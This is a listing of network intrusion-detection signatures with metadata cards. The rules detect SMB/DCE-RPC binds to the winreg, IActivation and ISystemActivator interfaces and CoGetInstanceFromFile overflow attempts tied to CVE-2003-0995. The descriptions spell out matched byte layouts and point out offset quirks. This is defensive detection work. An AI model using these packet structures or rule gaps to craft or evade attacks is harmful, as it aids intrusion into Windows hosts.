alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103208; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 139 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the winreg interface 338cd001-2244-31f1-aaaa-900038001003. This variant requires the SMB Unicode flag set and the DCE/RPC little-endian data-representation bit clear. Sets smb.tree.bind.winreg, which the OpenKey rules require.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103209

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103209; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg unicode little endian andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 139 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the winreg interface 338cd001-2244-31f1-aaaa-900038001003. This variant requires both the SMB Unicode flag and the DCE/RPC little-endian data-representation bit set. Sets smb.tree.bind.winreg, which the OpenKey rules require.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103188

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103188; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile andx overflow attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 1 (|00 01|) inside an SMB Trans to \PIPE\ on port 445, on a session where smb.tree.bind.msqueue was set; SMB Unicode flag clear, DCE/RPC little-endian bit clear. Alerts when the 4-byte value 20 bytes into the request stub exceeds 128.

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0995

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103438

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103438; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile little endian andx attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 4 (|04 00|) on a session where dce.isystemactivator.bind was set, inside an SMB Trans to \PIPE\ on port 445; SMB Unicode flag clear, DCE/RPC little-endian bit set. Looks for a \\ UNC prefix later in the payload and then tests a 4-byte little-endian value against 256. Note that this byte_test has no relative modifier, so it reads absolute payload offset 6 rather than a position after the \\ match.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103189

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103189; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile little endian andx overflow attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 1 (|01 00|) inside an SMB Trans to \PIPE\ on port 445, on a session where smb.tree.bind.msqueue was set; SMB Unicode flag clear, DCE/RPC little-endian bit set. Alerts when the 4-byte value 20 bytes into the request stub exceeds 128. Note that the byte_test carries no little modifier, so that value is read big-endian even in this little-endian variant.

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0995

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103439

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103439; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode andx attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 4 (|00 04|) on a session where dce.isystemactivator.bind was set, inside an SMB Trans to \PIPE\ on port 445; SMB Unicode flag set, DCE/RPC little-endian bit clear. Looks for a UTF-16 \\ UNC prefix (|5C 00 5C 00|) later in the payload and then tests a 4-byte value against 256. Note that this byte_test has no relative modifier, so it reads absolute payload offset 8 rather than a position after the \\ match.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103190

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103190; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode andx overflow attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 1 (|00 01|) inside an SMB Trans to \PIPE\ on port 445, on a session where smb.tree.bind.msqueue was set; SMB Unicode flag set, DCE/RPC little-endian bit clear. Alerts when the 4-byte value 20 bytes into the request stub exceeds 256.

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0995

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103440

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103440; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode little endian andx attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 4 (|04 00|) on a session where dce.isystemactivator.bind was set, inside an SMB Trans to \PIPE\ on port 445; SMB Unicode flag set, DCE/RPC little-endian bit set. Looks for a UTF-16 \\ UNC prefix (|5C 00 5C 00|) later in the payload and then tests a 4-byte little-endian value against 256. Note that in this variant both the isdataat:4 and the byte_test lack the relative modifier, so they operate on absolute payload offsets (4 and 8) rather than on positions after the preceding matches.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103191

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103191; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode little endian andx overflow attempt

Attack target : Not defined

Description : DCE/RPC v5 request (packet type 0x00) with opnum 1 (|01 00|) inside an SMB Trans to \PIPE\ on port 445, on a session where smb.tree.bind.msqueue was set; SMB Unicode flag set, DCE/RPC little-endian bit set. Alerts when the 4-byte value 20 bytes into the request stub exceeds 256. Note that the byte_test carries no little modifier, so that value is read big-endian even in this little-endian variant.

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0995

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103389

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103389; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 445 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the IActivation interface 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57. This variant requires both the SMB Unicode flag and the DCE/RPC little-endian data-representation bit clear. Sets dce.iactivation.bind.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103390

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103390; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation little endian andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 445 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the IActivation interface 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57. This variant requires the SMB Unicode flag clear and the DCE/RPC little-endian data-representation bit set. Sets dce.iactivation.bind.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103391

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103391; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation unicode andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 445 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the IActivation interface 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57. This variant requires the SMB Unicode flag set and the DCE/RPC little-endian data-representation bit clear. Sets dce.iactivation.bind.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103392

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103392; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation unicode little endian andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 445 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the IActivation interface 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57. This variant requires both the SMB Unicode flag and the DCE/RPC little-endian data-representation bit set. Sets dce.iactivation.bind.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103405

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103405; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 445 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the ISystemActivator interface 000001a0-0000-0000-c000-000000000046. This variant requires both the SMB Unicode flag and the DCE/RPC little-endian data-representation bit clear. Sets dce.isystemactivator.bind, which the CoGetInstanceFromFile attempt rules require.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103406

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103406; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator little endian andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 445 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the ISystemActivator interface 000001a0-0000-0000-c000-000000000046. This variant requires the SMB Unicode flag clear and the DCE/RPC little-endian data-representation bit set. Sets dce.isystemactivator.bind, which the CoGetInstanceFromFile attempt rules require.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103407

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103407; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator unicode andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 445 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the ISystemActivator interface 000001a0-0000-0000-c000-000000000046. This variant requires the SMB Unicode flag set and the DCE/RPC little-endian data-representation bit clear. Sets dce.isystemactivator.bind, which the CoGetInstanceFromFile attempt rules require.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103408

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103408; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator unicode little endian andx bind attempt

Attack target : Not defined

Description : Flowbit-setting rule that never alerts on its own (flowbits:noalert). Matches an SMB Trans request to \PIPE\ on port 445 carrying a DCE/RPC v5 bind (packet type 0x0B) whose abstract-syntax UUID (the 16 bytes at distance 29 after the packet type) is the ISystemActivator interface 000001a0-0000-0000-c000-000000000046. This variant requires both the SMB Unicode flag and the DCE/RPC little-endian data-representation bit set. Sets dce.isystemactivator.bind, which the CoGetInstanceFromFile attempt rules require.

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

